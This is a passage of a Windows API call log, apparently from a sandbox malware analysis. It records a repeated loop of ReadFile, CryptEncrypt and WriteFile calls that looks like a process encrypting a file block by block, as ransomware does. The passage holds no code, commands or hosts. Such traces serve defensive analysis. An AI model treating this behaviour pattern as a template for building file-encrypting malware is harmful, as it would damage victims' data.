hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.808] GetLastError () returned 0x0 [0144.808] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.808] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.808] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.808] GetLastError () returned 0x0 [0144.808] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.809] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.809] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.809] GetLastError () returned 0x0 [0144.809] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.809] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.809] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.809] GetLastError () returned 0x0 [0144.809] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.809] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.809] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.809] GetLastError () returned 0x0 [0144.809] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.809] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.809] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.809] GetLastError () returned 0x0 [0144.809] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.809] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.809] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.809] GetLastError () returned 0x0 [0144.809] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.809] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.809] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.809] GetLastError () returned 0x0 [0144.809] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.809] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.810] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.810] GetLastError () returned 0x0 [0144.810] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.810] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.810] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.810] GetLastError () returned 0x0 [0144.810] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.810] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.810] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.810] GetLastError () returned 0x0 [0144.810] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.810] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.810] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.810] GetLastError () returned 0x0 [0144.810] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.810] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.810] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.810] GetLastError () returned 0x0 [0144.810] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.810] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.810] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.810] GetLastError () returned 0x0 [0144.810] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.811] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.811] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.811] GetLastError () returned 0x0 [0144.811] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.811] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.811] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.811] GetLastError () returned 0x0 [0144.811] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.811] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.811] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.811] GetLastError () returned 0x0 [0144.811] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.811] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.811] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.811] GetLastError () returned 0x0 [0144.811] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.811] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.811] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.811] GetLastError () returned 0x0 [0144.811] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.811] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.811] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.811] GetLastError () returned 0x0 [0144.811] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.812] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.812] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.812] GetLastError () returned 0x0 [0144.812] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.812] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.812] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.812] GetLastError () returned 0x0 [0144.812] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.812] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.812] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.812] GetLastError () returned 0x0 [0144.812] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.812] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.812] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.812] GetLastError () returned 0x0 [0144.812] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.812] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.812] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.812] GetLastError () returned 0x0 [0144.813] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.813] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.813] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.813] GetLastError () returned 0x0 [0144.813] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.813] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.813] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.813] GetLastError () returned 0x0 [0144.813] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.813] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.813] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.813] GetLastError () returned 0x0 [0144.813] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.813] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.813] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.813] GetLastError () returned 0x0 [0144.813] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.813] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.813] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.813] GetLastError () returned 0x0 [0144.813] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.814] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.814] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.814] GetLastError () returned 0x0 [0144.814] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.814] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.814] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.814] GetLastError () returned 0x0 [0144.814] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.814] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.814] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) 